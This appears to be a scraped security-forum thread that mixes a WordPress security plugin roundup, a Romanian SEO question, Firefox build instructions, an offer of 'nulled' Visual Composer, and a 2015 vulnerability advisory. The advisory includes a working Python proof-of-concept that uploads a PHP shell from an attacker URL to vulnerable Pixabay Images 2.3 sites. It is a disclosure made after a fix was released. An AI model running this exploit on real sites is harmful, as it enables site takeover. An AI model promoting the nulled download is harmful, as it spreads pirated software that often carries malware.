serious about your online business running on WordPress, you must use any of these plugins to make it secure. These are the 7 best security plugins available for WordPress. 1. WordFence WordFence is one of the most popular WordPress security plugins. It keeps on checking your website for malware infection. If scans all the files of your WordPress core, theme and plugins. If it finds any kind of infection, it will notify you. It claims to make your WordPress website 50 times faster and secure. For making your website faster, it uses Falcom caching engine. This plugin is free, but a few advanced features are available for premium users. If you can afford it, do it. This plugin blocks bruteforce attack and can add two factor authentication via SMS. You can also block traffic from a specific country. It also includes a firewall to block fake traffic, botnet and scanners. It also scans your hosting for known backdoors including C99, R57 and others. If it finds anything, you will instantly get email notification. It also scans your posts and comments for malicious code. It also supports multi-site. You can also check the traffic on your WordPress website in real time and see if there is any security threat attacking your website. Download WordFence 2. BulletProof Security BulletProof Security is another popular WordPress security plugin that takes care of various things. It adds firewall security, database security, login security and more. It comes with four-click setup interface. Just activate this plugin and then relax. It will take care of your website. It limits failed login attempts and blocks security scanners, fake traffic, IP blocking and code scanners. It keeps on checking the code of WordPress core files, themes and plugins. In case of any known infection, it notifies admin. It also optimizes the performance of your website by adding caching. It comes with built-in file manager for htaccess. It protects WordPress websites against various vulnerabilities including XSS, RFI, CRLF, CSRF, Base64, Code Injection, SQL Injection and many other. This plugin keeps itself updated with new vulnerabilities to keep your website protected. It keeps on updating it according to new exploits and vulnerabilities. It also has a pro version which offers some advanced features to improve the security of your website. But the free version is popular enough to make your website secure. Download BulletProof Security 3. Sucuri Security Sucuri Security is the security plugin for WordPress. This plugin is from the popular website security and auditing company Sucuri. This plugin offers various security features like security activity auditing, file integrity monitoring, malware scanning, blacklist monitoring, and website firewall. It incorporates various blacklist engines including Google Safe Browsing, Sucuri Labs, Norton, McAfee Site Advisor and more to check your website. If there is anything wrong, it will notify you via email. It protects your website from DOS attack, Zero Day Disclosure Patches, bruteforce attacks and other scanner attacks. It also keeps log of all activities and keep these logs safe in the Sucuri cloud. So, if an attacker is able to bypass the security controls, your security logs will be safe within Sucuri’s security operations center. If you are willing to pay, you can go for the Sucuri premium service. They are a well known web application security company with a team of experts. So, you can get better service and advice. Download Sucuri Security 4. iThemes Security (formerly Better WP Security) iThemes Security is also a nice WordPress security plugin which claims to offer 30+ ways to secure and protect your WordPress website. With one click installation, you can stop automated attacks and protect your website. it also fixes various common security holes in your website. It tracks registered users’ activity and adds two-factor authentication, import/export settings, password expiration, malware scanning, and various other things. It scans the entire website and tries to find if there is any potential vulnerability in your website. It also prevents bruteforce attacks and ban IP addresses which try to bruteforce. It also forces users to use secure passwords and also forces SSL for admin area in server support. Unlike other plugins, the GeoIP banning feature is not available. But the company has promised to bring this feature soon. We cannot say exactly when, but it says the feature is coming soon. It also integrates Google reCAPTCHA to prevent comment spam on your website. Download iThemes security 5. Acunetix WP SecurityScan Acunetix WP Security Scan is the WordPress security plugin by Acunetix. Acunetix is a well known company in web application security. It offers a security scanning tool to find vulnerabilities in web applications. This plugin helps you to secure your WordPress website and suggests measures to improve the security. It offers file permission security, version hiding, admin protection, removing WP generator tag from source, and database security. It removes various information from the source code of the page which can be used in the information gathering process before attack. This includes theme update information, plugin update information, really simple discover meta tag, WordPress version, Windows live write meta tag, error information from login page, versions from scripts, versions from stylesheets, database and php error reporting. It also offers a database backup tool to take a backup of your website. With its live traffic monitor tool, you can check traffic in real time. It also scans your website to notify known web application vulnerabilities. Download Acunetix WP SecurityScan 6. All In One WP Security & Firewall All In One WP Security & Firewall is another popular WordPress security plugin to check vulnerabilities in your WordPress website. This plugin is easy to use and reduces the security risks by adding recommended security practices. It protect against bruteforce login attack and lockdown if someone tries to bruteforce. It also sends you an email notification if somebody gets locked out due to failed login attempts. It detects if a user tries to save a weak password and forces him/her to use a strong password. It also monitors the account activity of all users and keeps track of username, IP and login date time. It also allows you to schedule automatic backup and receive email notification. It also protects PHP code by disabling admin area editing. It adds a web application firewall in your website and enables 5G Blacklist to prevent various attacks. It denies bad query strings, prevent XSS, CSRF, SQL injection, malicious bots and other security threats. It also has a security scanner which keeps track of files and notifies you about each changes in your WordPress system. It can also detect malicious code in your WordPress website. It blocks and protects your blog from comment spam. It also works with most plugins without any problem. Download All In One WP Security & Firewall 7. 6Scan Security 6Scan Security is a popular auto-fix protection for your WordPress site. It can protect your website from hackers. It offers rule-based protection for your website and tries to keep the security of your website up to date. It has a security scanner which scans and protect your website against SQL injection, Cross Site Scripting, CSRF, Directory traversal, Remote file including, DOS attack and other OWASP top ten security vulnerabilities. A notable feature of the plugin is its automatic vulnerability fix. When it finds any vulnerable code, it applies auto-fix by using its auto-fix server-side agent solution. It also has an automatic malware fix for malware related issues on your website. Like other plugins, it also sends email notifications if there is anything serious in your website. Download 6 Scan Security Additional security measures Along with these WordPress plugins, you should also follow a few security measures from your side. These will help you in improving the security of your blog. Always keep your WordPress installation up to date. Update your WordPress as soon as possible if there is any new WordPress update. Most of the times, hacked websites are those which are using an older version of WordPress. Older versions of WordPress always have a few known security issues. And exploits for these security issues are available for free. Even a kid can hack your website if it is running on a vulnerable version of WordPress. Always keep plugins and themes added in your blog updates to latest version. New versions always come with new features and security fixes. So, updating plugins and themes is necessary. Most of the time, these third party plugins and themes are the reason for vulnerability in WordPress websites. Attackers can exploit these plugins to gain access to your website or inject malicious script in your website. Download themes and plugins only from trusted sources. Nulled themes and themes from untrusted sources generally contain malware in the code. If you install any security plugin, you will be notified, but why to take risk. Avoid any unknown source for download plugins and themes. Avoid using the administrator username ‘admin’, because this is default and common. By using this username in your blog, you are making the attacker’s work easier. He does not need to guess the username now, just bruteforce your website for username admin. Thanks to these plugins, bruteforce will not work anymore. Always use strong password for your WordPress account. WordPress bruteforcing tools are available. So, do not take the risk. Use a long password with capital letters, small case letters, numbers and special characters. A combination of these makes a strong password which is hard to guess. Conclusion These are few WordPress security plugins you can use to make your WordPress blog secure. You do not need to download all these plugins. Just try any one and see if it suits you. If you are not happy with its performance, you can download any other plugin to check and use. Every single plugin offers unique security features. You will feel relaxed after having any of these plugins in your website. Malware scanning, exploit scanning and brute force protection are few features which you must have in your website. If you have a good budget and do not want to be in technicalities, you can go for premium versions of the plugins which offer more advanced security features with detail reports. A few plugins also offer free customer support and security assessment with the pro version. With an increasing number of hacking attacks, it is necessary to have security in your website. If you are a WordPress user, what security plugin do you use in your website? Share it with us in the comments. Source
  19. Mogwai Security Advisory MSA-2015-01 ---------------------------------------------------------------------- Title: WP Pixarbay Images Multiple Vulnerabilities Product: Pixarbay Images (Wordpress Plugin) Affected versions: 2.3 Impact: high Remote: yes Product link: https://wordpress.org/plugins/pixabay-images/ Reported: 14/01/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- Pixabay Images is a WordPress plugin that let's you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required. Business recommendation: ---------------------------------------------------------------------- Update to version 2.4 Vulnerability description: ---------------------------------------------------------------------- 1) Authentication bypass The plugin does not correctly check if the user is logged in. Certain code can be called without authentication 2) Arbitrary file upload The plugin code does not validate the host in the provided download URL, which allows to upload malicious files, including PHP code. 3) Path Traversal Certain values are not sanitized before they are used in a file operation. This allows to store files outside of the "download" folder. 4) Cross Site Scripting (XSS) The generated author link uses unsanitized user values which can be abused for Cross Site Scripting (XSS) attacks. Proof of concept: ---------------------------------------------------------------------- The following PoC Python script can be used to download PHP files from a attacker controlled host. #!/usr/bin/env python import argparse import httplib, urllib from urlparse import urlparse def exploit(target_url, shellcode_url): target = urlparse(target_url) params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url, 'image_user': 'none', 'q':'xxx/../../../../../../mogwai'}) headers = headers = {"Content-type": "application/x-www-form-urlencoded"} print "[+] Sending download request...." conn = httplib.HTTPConnection(target.netloc) conn.request("POST", target.path + "/wp-admin/", params, headers) response = conn.getresponse() response_data = response.read() if response.status != 200 and response_data != "Error: File attachment metadata error": print "[-] Something went wrong" print response_data exit() conn.close() # ---- Main code ---------------- parser = argparse.ArgumentParser() parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/") parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php") print "----------------------------------------------" print " pixabay upload wordpress plugin exploit PoC" print " Mogwai security" print "----------------------------------------------" arguments = parser.parse_args() exploit(arguments.target_url, arguments.shellcode_url) Vulnerable / tested versions: ---------------------------------------------------------------------- Pixabay Images 2.3 Disclosure timeline: ---------------------------------------------------------------------- 14/01/2014: Reporting issues to the plugin author 15/01/2014: Release of fixed version (2.4) 19/01/2014: Public advisory Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source
  20. Salut! De curand mi-am facut un blog pe wordpress si cum nu am mai lucrat cu aceasta platforma de vreo 2 ani cred ca lucrurile s-au mai schimbat si prefer sa va intreb pe voi. Inainte foloseam ca si plugin pentru SEO, All in one SEO Pack, imi puteti recomanda altul mai bun sau este ok daca-l folosesc tot pe asta? Mai este si SeoPressor care am inteles ca este foarte bun, doar ca este premium. Multumesc anticipat!
  21. Visual Composer for WordPress will save you tons of time working on the site content. Now you’ll be able to create complex layouts within minutes! Sales page Demo page Download nulled
  22. Introduction to Firefox Firefox is a stand-alone browser based on the Mozilla codebase. This package is known to build and work properly using an LFS-7.2 platform. Package Information Download (FTP): ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/16.0.1/source/firefox-16.0.1.source.tar.bz2 Download MD5 sum: 78e641c67dc4a40cb3f48fce3e782d41 Download size: 85 MB Estimated disk space required: 994 MB (34 MB installed) (or 647 MB and 4.1 MB if using xulrunner) Estimated build time: 27 SBU (0.4 SBU if using xulrunner) Firefox Dependencies Required alsa-lib-1.0.26 GTK+-2.24.13 Zip-3.0 UnZip-6.0 Recommended yasm-1.2.0 libvpx-v1.1.0 (to allow Firefox to play webm videos). Optional D-Bus Bindings startup-notification-0.12 SQLite-3.7.14.1 Hunspell: open source spell checking, stemming, morphological analysis and generation under GPL, LGPL or MPL licenses libevent-2.0.20 Doxygen-1.8.2 gnome-vfs-2.24.4 libgnomeui-2.24.5 (for integration with the old version of Gnome) libnotify-0.7.5 NSPR-4.9.2 NSS-3.13.6 Wireless Tools-29 Valgrind Home (only for testing the jemalloc code) Wget-1.14 Xulrunner-16.0.1 User Notes: firefox – BLFS Trac Installation of Firefox There are two major methods for building Firefox. In the standard case, the entire suite of libraries is built and installed. In the other, most of the system is built using the procedures found in Xulrunner-16.0.1. This is advantageous if you are planning to build other related packages such as IcedTea-Web-1.3. With either build method, you need to run the main build procedure below with the appropriate options in the mozconfig file. Then use the appropriate install instructions depending on the chosen build method. The configuration of Firefox is accomplished by creating a mozconfig file containing the desired configuration options. A default mozconfig is created below. To see the entire list of available configuration options (and an abbreviated description of each one), issue ./configure --help. You may also wish to review the entire file and uncomment any other desired options. The commented line for --with-libxul-sdk has an escaped dollar sign - if you have chosed to paste the entries into a mozconfig file in your editor, you do not need the escape, it is only necessary when invoking a subshell in a HERE document. Create the file by issuing the following command: cat > mozconfig << EOF # If you have a multicore machine you can speed up the build by running # several jobs at once, but if you have a single core, delete this line: mk_add_options MOZ_MAKE_FLAGS="-j4" # If you have not installed Yasm, uncomment this option: # ac_add_options --disable-webm # If you have installed DBus-Glib delete this option: ac_add_options --disable-dbus # If you have installed wireless-tools delete this option: ac_add_options --disable-necko-wifi # If you have installed libnotify delete this option: ac_add_options --disable-libnotify # If you have installed xulrunner uncomment these two lines: # ac_add_options --with-system-libxul # ac_add_options --with-libxul-sdk=\$(pkg-config --variable=sdkdir libxul) # Note: The backslash above is to facilitate a paste operation. It # should not appear in the mozconfig file. # Uncomment these if you have installed them: # ac_add_options --enable-startup-notification # ac_add_options --enable-system-hunspell # ac_add_options --enable-system-sqlite # ac_add_options --with-system-libevent # ac_add_options --with-system-libvpx # ac_add_options --with-system-nspr # ac_add_options --with-system-nss mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/firefox-build-dir ac_add_options --enable-official-branding ac_add_options --prefix=/usr # The rest of these options have no effect if you're # building against an already installed xulrunner: ac_add_options --disable-crashreporter ac_add_options --disable-debug ac_add_options --disable-installer ac_add_options --disable-static ac_add_options --disable-tests ac_add_options --disable-updater ac_add_options --enable-shared ac_add_options --enable-system-cairo ac_add_options --enable-system-ffi ac_add_options --with-pthreads ac_add_options --with-system-jpeg ac_add_options --with-system-png ac_add_options --with-system-zlib EOF If you are building a stand-alone firefox with system versions of nspr, nss, or sqlite issue the following command: sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' \ browser/installer/Makefile.in && Compile Firefox by issuing the following commands: sed -i 's# ""##' browser/base/Makefile.in && make -f client.mk This package does not come with a test suite. If you have not linked Firefox against an installed Xulrunner: make -C firefox-build-dir/browser/installer Now, as the root user, if you have not linked Firefox against an installed Xulrunner, install the package: rm -rf /usr/lib/firefox-16.0.1 && mkdir /usr/lib/firefox-16.0.1 && tar -xvf firefox-build-dir/dist/firefox-16.0.1.en-US.linux-$(uname -m).tar.bz2 \ -C /usr/lib/firefox-16.0.1 --strip-components=1 && ln -sfv ../lib/firefox-16.0.1/firefox /usr/bin && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 && chown -R -v root:root /usr/lib/firefox-16.0.1 If you have linked against an already installed Xulrunner, as the root user: make -C firefox-build-dir install && rm /usr/bin/firefox && cat > /usr/bin/firefox << "HERE_DOC" && #!/bin/bash /usr/lib/xulrunner-16.0.1/xulrunner /usr/lib/firefox-16.0.1/application.ini "${@}" HERE_DOC chmod 755 /usr/bin/firefox && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 NPAPI Headers The above instructions just install the parts you need to run Firefox. If you want to compile gnash-0.8.10, the open source version of Flash, copy some headers that Gnash needs into /usr/include, as the root user: rm -rf /usr/include/npapi && mkdir -v /usr/include/npapi && cp -v dom/plugins/base/*.h /usr/include/npapi Command Explanations sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' ...: This sed fixes an error in the internal packaging check.. sed -i 's# ""##' browser/base/Makefile.in: This sed removes an unprintable control character from the title bar. make -f client.mk ...: Mozilla products are packaged to allow the use of a configuration file which can be used to pass the configuration settings to the configure command. make uses the client.mk file to get initial configuration and setup parameters. make -C firefox-build-dir/browser/installer: this creates a Firefox tarball similar to the ones you can download from Mozilla. tar -xfv firefox-build-dir/dist ...: This untars Firefox in /usr/lib. The --strip-components=1 option removes the leading 'firefox' directory from the filenames, allowing us to untar it into a versioned directory. make -C firefox-build-dir install: This runs make install in firefox-build-dir. ln -sfv ... /usr/bin/firefox: this puts a symbolic link to the firefox executable in your ${PATH}. mkdir -p /usr/lib/mozilla/plugins: this checks that /usr/lib/mozilla/plugins exists. ln -sv ... /usr/lib/firefox-16.0.1: this makes a symbolic link to /usr/lib/mozilla/plugins. It's not really needed, Firefox checks /usr/lib/mozilla/plugins by default, we make the symbolic link to keep all the plugins installed in one folder. Configuring Firefox If you deleted the --disable-webm option from your mozconfig, your Firefox can play most YouTube videos without the need for the flash plugin. To enable this, go to YouTube and click on 'Join the HTML5 Trial' (needs cookies enabled). If you use a desktop environment like Gnome or KDE you may like to create a firefox.desktop file so that Firefox appears in the panel's menus. If you didn't enable startup-notification in your mozconfig change the StartupNotify line to false. As the root user: mkdir -pv /usr/share/applications && cat > /usr/share/applications/firefox.desktop << "EOF" && [Desktop Entry] Encoding=UTF-8 Type=Application Name=Firefox Comment=Browse The Web Icon=firefox Exec=firefox Categories=Network;GTK;Application;Browser;WebBrowser; StartupNotify=true Terminal=false EOF ln -sfv /usr/lib/firefox-16.0.1/icons/mozicon128.png /usr/share/pixmaps/firefox.png Contents Installed Programs: firefox Installed Libraries: Numerous libraries, browser components, plugins, extensions, and helper modules installed in /usr/lib/firefox-16.0.1. Installed Directories: /usr/include/npapi and /usr/lib/firefox-16.0.1. sursa: Firefox-16.0.1
×
×
  • Create New...